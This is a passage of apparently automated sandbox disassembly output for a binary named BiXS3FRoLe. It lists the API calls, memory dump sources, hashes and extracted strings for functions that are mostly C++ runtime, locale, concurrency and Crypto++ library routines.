  • Part of subcall function 00B34D66: RtlFreeHeap.NTDLL(00000000,00000000,?,00B3D5F8,?,00000000,?,00000000,?,00B3D89C,?,00000007,?,?,00B3DC90,?), ref: 00B34D7C
  • Part of subcall function 00B34D66: GetLastError.KERNEL32(?,?,00B3D5F8,?,00000000,?,00000000,?,00B3D89C,?,00000007,?,?,00B3DC90,?,?), ref: 00B34D8E
• _free.LIBCMT ref: 00B3D8DC
• _free.LIBCMT ref: 00B3D8E7
• _free.LIBCMT ref: 00B3D93B
• _free.LIBCMT ref: 00B3D946
• _free.LIBCMT ref: 00B3D951
• _free.LIBCMT ref: 00B3D95C
Memory Dump Source
• Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
• Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
APIs
• __EH_prolog3.LIBCMT ref: 00B0D84A
• GetCurrentThreadId.KERNEL32 ref: 00B0D851
• atomic_compare_exchange.LIBCONCRT ref: 00B0D85F
• atomic_compare_exchange.LIBCONCRT ref: 00B0D883
  • Part of subcall function 00AE9401: mtx_do_lock.LIBCPMT ref: 00AE9409
• __Mtx_unlock.LIBCPMT ref: 00B0D8A8
• __Cnd_broadcast.LIBCPMT ref: 00B0D8BE
• Concurrency::details::_RefCounter::_Release.LIBCONCRT ref: 00B0D8D2
Similarity
• API ID: atomic_compare_exchange$Cnd_broadcastConcurrency::details::_Counter::_CurrentH_prolog3Mtx_unlockReleaseThreadmtx_do_lock
• String ID:
• API String ID: 420504553-0
APIs
• GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,00B01F19,?,?,?,00000000), ref: 00B027BC
• GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00B01F19,?,?,?,00000000), ref: 00B027C2
• GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,00B01F19,?,?,?,00000000), ref: 00B027EF
• GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00B01F19,?,?,?,00000000), ref: 00B027F9
• GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00B01F19,?,?,?,00000000), ref: 00B0280B
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00B02821
• __CxxThrowException@8.LIBVCRUNTIME ref: 00B0282F
Similarity
• API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
• String ID:
• API String ID: 4227777306-0
APIs
• __CxxThrowException@8.LIBVCRUNTIME ref: 00AE1997
Strings
Similarity
• API ID: Exception@8Throw
• String ID: Max$Min$RandomNumberType$invalid bit length
• API String ID: 2005118841-2498579642
APIs
Strings
Similarity
• API ID: __freea$__alloca_probe_16
• String ID: a/p$am/pm
• API String ID: 3509577899-3206640213
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 00AA8E09
• std::_Lockit::_Lockit.LIBCPMT ref: 00AA8E2B
• std::_Lockit::~_Lockit.LIBCPMT ref: 00AA8E4B
• __Getctype.LIBCPMT ref: 00AA8EE1
• std::_Facet_Register.LIBCPMT ref: 00AA8F00
• std::_Lockit::~_Lockit.LIBCPMT ref: 00AA8F18
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
• String ID:
• API String ID: 1102183713-0
APIs
• Concurrency::location::_Assign.LIBCMT ref: 00B12A3C
• Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 00B12A44
• Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00B12A6E
• Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 00B12A77
• Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00B12AFA
• Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 00B12B02
Similarity
• API ID: Concurrency::details::Context$Base::$GroupInternalScheduleSegment$AssignAvailableConcurrency::location::_DeferredEventMakeProcessor::ReleaseRunnableSchedulerTraceVirtual
• String ID:
• API String ID: 3929269971-0
APIs
• GetProcessHeap.KERNEL32(00000000,?,?,AE695AF0,00000000), ref: 00A752A8
• HeapFree.KERNEL32(00000000,?,AE695AF0,00000000), ref: 00A752AF
• CloseHandle.KERNEL32(?,AE695AF0,774C6230,?,AE695AF0,00000000,00000000,00000000), ref: 00A752D9
• CloseHandle.KERNEL32(?,?,AE695AF0,00000000,00000000,00000000), ref: 00A752DE
• CloseHandle.KERNEL32(?,?,AE695AF0,00000000,00000000,00000000), ref: 00A752E3
  • Part of subcall function 00AFF480: GetProcessHeap.KERNEL32(00000000,?,?,AE695AF0,00B4E060,000000FF,?,00A7528A,AE695AF0,774C6230), ref: 00AFF4CB
  • Part of subcall function 00AFF480: HeapFree.KERNEL32(00000000,?,?,AE695AF0,00B4E060,000000FF,?,00A7528A,AE695AF0,774C6230), ref: 00AFF4D2
Strings
                                                                                                        Similarity
                                                                                                        • API ID: Heap$CloseHandle$FreeProcess
                                                                                                        • String ID: 0bLw
                                                                                                        • API String ID: 3876841697-143776869
                                                                                                        • Opcode ID: d84b568e78ac1d42b6a33eb0afa041990ad0e2210ee2fb8a36e068febd5da300
                                                                                                        • Instruction ID: d2a2b702121edaed219a7381d7cbdc663828ceb13bd8d00e7ed534ddfc405054
                                                                                                        • Opcode Fuzzy Hash: d84b568e78ac1d42b6a33eb0afa041990ad0e2210ee2fb8a36e068febd5da300
                                                                                                        • Instruction Fuzzy Hash: 11319571E006159BDB11DFA4DC81B5ABBA4FF05761F1442A9E918AB3A1DB715C04CB90
                                                                                                        APIs
                                                                                                        • Concurrency::details::SchedulerProxy::IncrementFixedCoreCount.LIBCONCRT ref: 00B0E18B
                                                                                                          • Part of subcall function 00B0F682: Concurrency::details::SchedulerProxy::ToggleBorrowedState.LIBCONCRT ref: 00B0F6D1
                                                                                                        • GetCurrentThread.KERNEL32 ref: 00B0E195
                                                                                                        • Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 00B0E1A1
                                                                                                          • Part of subcall function 00B0303F: Concurrency::details::platform::__GetThreadGroupAffinity.LIBCONCRT ref: 00B03051
                                                                                                          • Part of subcall function 00B034E6: Concurrency::details::platform::__SetThreadGroupAffinity.LIBCONCRT ref: 00B034ED
                                                                                                        • Concurrency::details::SchedulerProxy::IncrementCoreSubscription.LIBCONCRT ref: 00B0E1E4
                                                                                                          • Part of subcall function 00B0F634: SetEvent.KERNEL32(?,?,00B0E1E9,00B0EF7D,00000000,?,00000000,00B0EF7D,00000004,00B0F629,?,00000000,?,?,00000000), ref: 00B0F678
                                                                                                        • Concurrency::details::SchedulerProxy::AddExecutionResource.LIBCONCRT ref: 00B0E1ED
                                                                                                          • Part of subcall function 00B0EC63: __EH_prolog3.LIBCMT ref: 00B0EC6A
                                                                                                          • Part of subcall function 00B0EC63: List.LIBCONCRT ref: 00B0EC99
                                                                                                        • Concurrency::details::ExecutionResource::SetAsCurrent.LIBCMT ref: 00B0E1FD
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::$Proxy::Scheduler$AffinityThread$Concurrency::details::platform::__CoreCurrentExecutionGroupHardwareIncrement$Affinity::BorrowedCountEventFixedH_prolog3ListResourceResource::StateSubscriptionToggle
                                                                                                        • String ID:
                                                                                                        • API String ID: 2908504212-0
                                                                                                        • Opcode ID: 010235c22700aa8934bd8f936e695dfefcd1e7dc525417b320223a86ab6ce00f
                                                                                                        • Instruction ID: 14dca3f3def4b3412b1ece0339fb8b649ad4dec0f175cd2e36ccfbb3f8993e2b
                                                                                                        • Opcode Fuzzy Hash: 010235c22700aa8934bd8f936e695dfefcd1e7dc525417b320223a86ab6ce00f
                                                                                                        • Instruction Fuzzy Hash: 05218C31500B159FCB25EF68C9908ABBBF9FF4C700700499DE452A76A1DB74F905CB91
                                                                                                        APIs
                                                                                                        • GetLastError.KERNEL32(?,?,00B1A25F,00B17DFA,00B443DF,00000008,00B44737,?,?,?,?,00B14F23,?,?,AE695AF0), ref: 00B1A276
                                                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00B1A284
                                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00B1A29D
                                                                                                        • SetLastError.KERNEL32(00000000,?,00B1A25F,00B17DFA,00B443DF,00000008,00B44737,?,?,?,?,00B14F23,?,?,AE695AF0), ref: 00B1A2EF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLastValue___vcrt_
                                                                                                        • String ID:
                                                                                                        • API String ID: 3852720340-0
                                                                                                        • Opcode ID: b4eaa43680ca8cb9cb889857c291ea7e604e6cea6f227dda6f33d56c0e2c9020
                                                                                                        • Instruction ID: bcb5b4ec6aee58f8fa24860fc0ba5c9e1f0c3bff50dd73c7c9574aa1cde001ac
                                                                                                        • Opcode Fuzzy Hash: b4eaa43680ca8cb9cb889857c291ea7e604e6cea6f227dda6f33d56c0e2c9020
                                                                                                        • Instruction Fuzzy Hash: 7901FC3251A3226E96247BB47C869BA27C5DB1177176003B9F514821F2EFB25CC09385
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 00AE57EB
                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AE57F5
                                                                                                          • Part of subcall function 00A72B00: std::_Lockit::_Lockit.LIBCPMT ref: 00A72B1D
                                                                                                          • Part of subcall function 00A72B00: std::_Lockit::~_Lockit.LIBCPMT ref: 00A72B39
                                                                                                        • numpunct.LIBCPMT ref: 00AE582F
                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00AE5846
                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AE5866
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00AE5884
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrownumpunct
                                                                                                        • String ID:
                                                                                                        • API String ID: 2509942033-0
                                                                                                        • Opcode ID: af04e4fd5a9fb2b877bd58e39c7ba73e9485f20bb73ef563a3dc141c3d9e5b5a
                                                                                                        • Instruction ID: 330463be2f4a4fe4260fdae92f50c5fcb4f6b16816525583e2e1c3b2c6a96814
                                                                                                        • Opcode Fuzzy Hash: af04e4fd5a9fb2b877bd58e39c7ba73e9485f20bb73ef563a3dc141c3d9e5b5a
                                                                                                        • Instruction Fuzzy Hash: 55110E32D002548BCF05EBB9DD51BFE77B0AFA4724F284889E401AB2A1CF749E00CB90
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 00AF85FC
                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF8606
                                                                                                          • Part of subcall function 00A72B00: std::_Lockit::_Lockit.LIBCPMT ref: 00A72B1D
                                                                                                          • Part of subcall function 00A72B00: std::_Lockit::~_Lockit.LIBCPMT ref: 00A72B39
                                                                                                        • messages.LIBCPMT ref: 00AF8640
                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00AF8657
                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF8677
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00AF8695
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmessages
                                                                                                        • String ID:
                                                                                                        • API String ID: 438560357-0
                                                                                                        • Opcode ID: 8463a3412bcb61e9e029de546d52e12ccc1cd48c7cb1d397bc8d0c1da61305e6
                                                                                                        • Instruction ID: 37360988881c2d00c249b24ec7138099012cded015d966921c27aca5e61b5a07
                                                                                                        • Opcode Fuzzy Hash: 8463a3412bcb61e9e029de546d52e12ccc1cd48c7cb1d397bc8d0c1da61305e6
                                                                                                        • Instruction Fuzzy Hash: 6E11A0329002189BCF05EBE4DD55AFD77B5AF94710F644949F505AB2E1CF789E01CB90
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 00AF8556
                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF8560
                                                                                                          • Part of subcall function 00A72B00: std::_Lockit::_Lockit.LIBCPMT ref: 00A72B1D
                                                                                                          • Part of subcall function 00A72B00: std::_Lockit::~_Lockit.LIBCPMT ref: 00A72B39
                                                                                                        • collate.LIBCPMT ref: 00AF859A
                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00AF85B1
                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF85D1
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00AF85EF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcollate
                                                                                                        • String ID:
                                                                                                        • API String ID: 2363045490-0
                                                                                                        • Opcode ID: dc0f1d01a08bc79baeb0bd97b4b9273949ceccaabb874a49dd9d4563a6c2f53a
                                                                                                        • Instruction ID: 947b74f62570a8a28df22ee2cf324ec5e9e295f0c97572f3c9fbaa60fb6ce54d
                                                                                                        • Opcode Fuzzy Hash: dc0f1d01a08bc79baeb0bd97b4b9273949ceccaabb874a49dd9d4563a6c2f53a
                                                                                                        • Instruction Fuzzy Hash: B41170329002289BCF05EBE4CD52AFD77B5AF98720F244449F5156B2A1CF789E01CB90
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 00AF87EE
                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF87F8
                                                                                                          • Part of subcall function 00A72B00: std::_Lockit::_Lockit.LIBCPMT ref: 00A72B1D
                                                                                                          • Part of subcall function 00A72B00: std::_Lockit::~_Lockit.LIBCPMT ref: 00A72B39
                                                                                                        • moneypunct.LIBCPMT ref: 00AF8832
                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00AF8849
                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF8869
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00AF8887
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
                                                                                                        • String ID:
                                                                                                        • API String ID: 113178234-0
                                                                                                        • Opcode ID: e79197ba51d8abec18ee5801fd065ad069febf579dac3f4f5df2ad67d0a4a146
                                                                                                        • Instruction ID: 615317eebea0ae6cc3d380b8ba5451a1de7440952e752c740d2c1d55a1e812aa
                                                                                                        • Opcode Fuzzy Hash: e79197ba51d8abec18ee5801fd065ad069febf579dac3f4f5df2ad67d0a4a146
                                                                                                        • Instruction Fuzzy Hash: BC119A32D002589BCF05EBE4CD52AFD77B5AF94760F644449F601AB2A2CF789E01CB90
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 00AF8894
                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF889E
                                                                                                          • Part of subcall function 00A72B00: std::_Lockit::_Lockit.LIBCPMT ref: 00A72B1D
                                                                                                          • Part of subcall function 00A72B00: std::_Lockit::~_Lockit.LIBCPMT ref: 00A72B39
                                                                                                        • moneypunct.LIBCPMT ref: 00AF88D8
                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00AF88EF
                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF890F
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00AF892D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
                                                                                                        • String ID:
                                                                                                        • API String ID: 113178234-0
                                                                                                        • Opcode ID: 595356d092817bc475926b8f327a67624172b9ee9102da10c62194845520e175
                                                                                                        • Instruction ID: 8344905767370cb0e18f5f81db76eff082618901e7be382bc75100baf3982a3f
                                                                                                        • Opcode Fuzzy Hash: 595356d092817bc475926b8f327a67624172b9ee9102da10c62194845520e175
                                                                                                        • Instruction Fuzzy Hash: 6D11A0329002189BCF05EBE4CD41AFE7BB4AF84714F244449F5016B2A1CF789E01CB91
                                                                                                        APIs
                                                                                                        • GetLastError.KERNEL32(000000FF,00000000,00B213F8,00000000,00000000,?,00B218DE,00000000,00000000,00AABDFF,?,000000FF), ref: 00B3437E
                                                                                                        • _free.LIBCMT ref: 00B343B1
                                                                                                        • _free.LIBCMT ref: 00B343D9
                                                                                                        • SetLastError.KERNEL32(00000000,00000000,00AABDFF,?,000000FF), ref: 00B343E6
                                                                                                        • SetLastError.KERNEL32(00000000,00000000,00AABDFF,?,000000FF), ref: 00B343F2
                                                                                                        • _abort.LIBCMT ref: 00B343F8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$_free$_abort
                                                                                                        • String ID:
                                                                                                        • API String ID: 3160817290-0
                                                                                                        • Opcode ID: 617b9320017331cfbec2d4aa189fd47b35d12add3883ed0fed4f66d04d921da8
                                                                                                        • Instruction ID: 9283d5ec431845f136da668779f832452e30f445bfae1c9490a59cdaaef060f9
                                                                                                        • Opcode Fuzzy Hash: 617b9320017331cfbec2d4aa189fd47b35d12add3883ed0fed4f66d04d921da8
                                                                                                        • Instruction Fuzzy Hash: 05F0813610060167CB1273A96C4AB2F39EADBC2BA1F3501F5F514932A1EF24AD058529
                                                                                                        APIs
                                                                                                        • ___std_type_info_name.LIBVCRUNTIME ref: 00A75B42
                                                                                                          • Part of subcall function 00B17BC4: ___unDName.LIBVCRUNTIME ref: 00B17BF0
                                                                                                        • ___std_type_info_name.LIBVCRUNTIME ref: 00A75BD4
                                                                                                          • Part of subcall function 00B17BC4: InterlockedPushEntrySList.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00B98810,', stored '), ref: 00B17C69
                                                                                                        Strings
                                                                                                        • ', stored ', xrefs: 00A75AF2
                                                                                                        • NameValuePairs: type mismatch for ', xrefs: 00A75AD2
                                                                                                        • ', trying to retrieve ', xrefs: 00A75B83
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ___std_type_info_name$EntryInterlockedListNamePush___un
                                                                                                        • String ID: ', stored '$', trying to retrieve '$NameValuePairs: type mismatch for '
                                                                                                        • API String ID: 1061249770-3022120042
                                                                                                        • Opcode ID: 11ec801cc36e94b81d68681db7939f0782c8b27ff64176ce55c2f651240654b7
                                                                                                        • Instruction ID: cfa54f8be77b93a0e221462958119dbfc5590c4716f5488490d824734edca2b2
                                                                                                        • Opcode Fuzzy Hash: 11ec801cc36e94b81d68681db7939f0782c8b27ff64176ce55c2f651240654b7
                                                                                                        • Instruction Fuzzy Hash: DCA1B071D106488BEB19DF68CD8479EBBB1FF45304F14C29CE418AB392DBB99684CB90
                                                                                                        APIs
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00ABCA08
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00ABCAC8
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Exception@8Throw
                                                                                                        • String ID: AAD$AuthenticatedDecryptionFilter$AuthenticatedEncryptionFilter
